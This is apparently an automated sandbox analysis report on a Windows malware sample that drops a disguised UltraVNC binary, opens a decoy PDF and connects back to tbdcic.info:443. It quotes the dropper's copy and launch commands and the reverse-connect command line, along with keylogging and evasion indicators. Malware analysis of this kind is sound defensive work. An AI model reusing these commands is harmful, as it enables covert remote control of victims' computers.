                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF74002C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF7400BA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF740005910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,19_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740019260 GetVersionExA,GetVersionExA,GetModuleHandleA,GetProcAddress,GetSystemInfo,19_2_00007FF740019260
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                          Source: sync_browser.exe, 00000013.00000002.3976778685.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                          Source: sync_browser.exe, 00000017.00000002.2298387181.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end nodegraph_19-22314
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400B7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF7400B7220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400126B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,19_2_00007FF7400126B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740069BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,19_2_00007FF740069BC0
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400B7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF7400B7220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400C47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF7400C47E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400B7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF7400B7220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400C47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF7400C47E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe23_2_00007FF740069BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400099C0 GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,19_2_00007FF7400099C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400174C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,19_2_00007FF7400174C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740004390 Sleep,CreateThread,CloseHandle,SendMessageA,FindWindowA,PostMessageA,SendMessageA,mouse_event,Sleep,mouse_event,FindWindowA,PostMessageA,19_2_00007FF740004390
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmdJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740017B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,19_2_00007FF740017B90
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                          Source: sync_browser.exe.6.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                          Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.drBinary or memory string: Program Manager
                          Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.drBinary or memory string: Shell_TrayWnd
                          Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.drBinary or memory string: Progman
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740069EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,19_2_00007FF740069EF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400BDF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_00007FF7400BDF80
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,calloc,calloc,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 19.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: mSRW5AfJpC.exe PID: 1516, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 7968, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 8104, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\Fgyxfc.Qnwi4I, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 19.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: mSRW5AfJpC.exe PID: 1516, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 7968, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 8104, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\Fgyxfc.Qnwi4I, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I, type: DROPPED
                          Source: sync_browser.exe, 00000013.00000002.3977022191.00000000028A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          Source: sync_browser.exe, 00000013.00000003.2412015746.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts
                          1
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          Exploitation for Privilege Escalation
                          1
                          Disable or Modify Tools
                          121
                          Input Capture
                          2
                          System Time Discovery
                          1
                          Remote Desktop Protocol
                          1
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts2
                          Native API
                          1
                          Valid Accounts
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol1
                          Screen Capture
                          12
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          11
                          Windows Service
                          1
                          Valid Accounts
                          2
                          Obfuscated Files or Information
                          Security Account Manager1
                          System Service Discovery
                          SMB/Windows Admin Shares121
                          Input Capture
                          1
                          Remote Access Software
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          1
                          Scheduled Task/Job
                          11
                          Access Token Manipulation
                          1
                          Timestomp
                          NTDS4
                          File and Directory Discovery
                          Distributed Component Object Model3
                          Clipboard Data
                          1
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          Service Execution
                          1
                          Bootkit
                          11
                          Windows Service
                          1
                          DLL Side-Loading
                          LSA Secrets26
                          System Information Discovery
                          SSHKeylogging2
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                          Process Injection
                          231
                          Masquerading
                          Cached Domain Credentials31
                          Security Software Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job
                          1
                          Valid Accounts
                          DCSync1
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Virtualization/Sandbox Evasion
                          Proc Filesystem3
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Access Token Manipulation
                          /etc/passwd and /etc/shadow11
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                          Process Injection
                          Network Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                          Bootkit
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579875 Sample: mSRW5AfJpC.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 52 x1.i.lencr.org 2->52 54 tbdcic.info 2->54 56 bg.microsoft.map.fastly.net 2->56 60 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->60 62 Yara detected UltraVNC Hacktool 2->62 64 AI detected suspicious sample 2->64 66 3 other signatures 2->66 10 mSRW5AfJpC.exe 8 2->10         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...\Fgyxfc.Qnwi4I, PE32+ 10->40 dropped 42 C:\Users\user\AppData\Local\...\Ivn55G.PqhJnU, PE32+ 10->42 dropped 70 Contains functionality to register a low level keyboard hook 10->70 14 cmd.exe 3 6 10->14         started        18 cmd.exe 6 10->18         started        20 cmd.exe 2 10->20         started        signatures6 process7 file8 44 C:\Windows\Tasks\sync_browser.exe, PE32+ 14->44 dropped 46 C:\Windows\Tasks\conhost.exe, PE32+ 14->46 dropped 72 Drops executables to the windows directory (C:\Windows) and starts them 14->72 22 sync_browser.exe 14->22         started        26 Acrobat.exe 18 61 14->26         started        28 taskkill.exe 1 14->28         started        34 14 other processes 14->34 48 C:\Windows\Tasks\Fgyxfc.Qnwi4I, PE32+ 18->48 dropped 50 C:\Windows\Tasks\Ivn55G.PqhJnU, PE32+ 18->50 dropped 30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        signatures9 process10 dnsIp11 58 tbdcic.info 194.190.152.201, 443, 49738, 49739 RSHB-ASRU Russian Federation 22->58 68 Contains VNC / remote desktop functionality (version string found) 22->68 36 AcroCEF.exe 92 26->36         started        signatures12 process13 process14 38 AcroCEF.exe 4 36->38         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          mSRW5AfJpC.exe3%ReversingLabs
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU0%ReversingLabs
                          C:\Windows\Tasks\Fgyxfc.Qnwi4I0%ReversingLabs
                          C:\Windows\Tasks\Ivn55G.PqhJnU0%ReversingLabs
                          C:\Windows\Tasks\conhost.exe0%ReversingLabs
                          C:\Windows\Tasks\sync_browser.exe0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
